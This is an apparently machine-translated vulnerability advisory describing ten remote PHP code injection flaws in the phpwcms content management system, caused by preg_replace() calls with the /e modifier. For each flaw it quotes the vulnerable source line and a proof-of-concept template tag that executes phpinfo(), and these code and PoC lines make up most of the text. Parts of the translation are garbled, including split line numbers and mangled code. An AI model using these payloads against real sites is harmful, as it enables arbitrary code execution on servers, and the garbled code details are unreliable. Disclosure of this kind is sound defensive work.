phpwcms 'preg_replace()'multiple remote PHP code injection vulnerability-vulnerability warning-the black bar safety net

2012-12-21T00:00:00
ID MYHACK58:62201236296
Type myhack58
Reporter 佚名
Modified 2012-12-21T00:00:00

Description

phpwcms is an open source content management system.

phpwcms 1.5.4.6 and other versions in the realization on the presence of a plurality of code injection vulnerability, an authenticated remote attacker can use the"backend user"\"admin user"\"backend user"account exploit these vulnerabilities,"frontend user"account can't exploit these vulnerabilities in the affected computer within the execute arbitrary PHP script code.

Test method:

1. Lines 699-700 of ./ include/inc_front/content.func.inc.php:

-------------------------------------------------------------

// list based navigation starting at given level

$replace = 'nav_list_struct($content["struct"],$content["cat_id"],"$1", "$2");';

$content["all"] = preg_replace('/\{NAV_LIST:(\d+):{0,1}(.*) {0,1}\}/e', $replace, $content["all"]);

PoC:

{NAV_LIST:1:{${phpinfo()}}}

2. Line 7 0 4 of ,. include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{NAV_LIST_TOP:(.?): (.?)\}/ e', 'css_level_list($content["struct"], $content["cat_path"], 0, "$1", 1, "$2")', $content["all"]);

PoC:

{NAV_LIST_TOP:{${phpinfo}}:1}

3. line 7 0 8 of ./ include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{NAV_LIST_CURRENT:(\d+):(.?): (.?)\}/ e', 'css_level_list($content["struct"],$content["cat_path"],$content["cat_id"],"$2","$1","$3")', $content["all"]);

PoC:

{NAV_LIST_CURRENT:1:{${phpinfo()}}:1}

4. Line 7 9 2 of ./ include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{BROWSE:NEXT:(.*?): (0/1)\}/e','get_index_link_next("$1",$2);',$content["all"]);

PoC:

{BROWSE:NEXT:{${phpinfo()}}:1}

5. Line 7 9 3 of ./ include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{BROWSE:PREV:(.*?): (0/1)\}/e','get_index_link_prev("$1",$2);',$content["all"]);

PoC:

{BROWSE:PREV:{${phpinfo()}}:1}

6. Line 2 6 6 1 of ./ include/inc_front/front.func.inc.php:

-------------------------------------------------------

$text = preg_replace('/\{LIVEDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$ livedate.'")', $text);

PoC:

{LIVEDATE:{${phpinfo()}} lang=ru}

7. Line 2 6 5 8 of ./ include/inc_front/front.func.inc.php:

-------------------------------------------------------

$text = preg_replace('/\{DATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$ date.'")', $text);

PoC:

{DATE:{${phpinfo()}} lang=ru}

8. Line 2 6 6 5 of ./ include/inc_front/front.func.inc.php:

-------------------------------------------------------

$text = preg_replace('/\{KILLDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$ killdate.'")', $text);

PoC:

{KILLDATE:{${phpinfo()}} lang=ru}

9. Line 2 6 6 8 of ./ include/inc_front/front.func.inc.php:

-------------------------------------------------------

return preg_replace('/\{NOW:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'. now().'")', $text);

PoC:

{NOW:{${phpinfo()}} lang=ru}

1 0. Line 2 6 7 4 of ./ include/inc_front/front.func.inc.php:

--------------------------------------------------------

$text = preg_replace('/\{'.$ rt.': (.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$ date.'")', $text);

PoC:

{DATE:{${phpinfo()}} lang=ru}

Safety recommendations:

The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version:

http://www.phpwcms.de/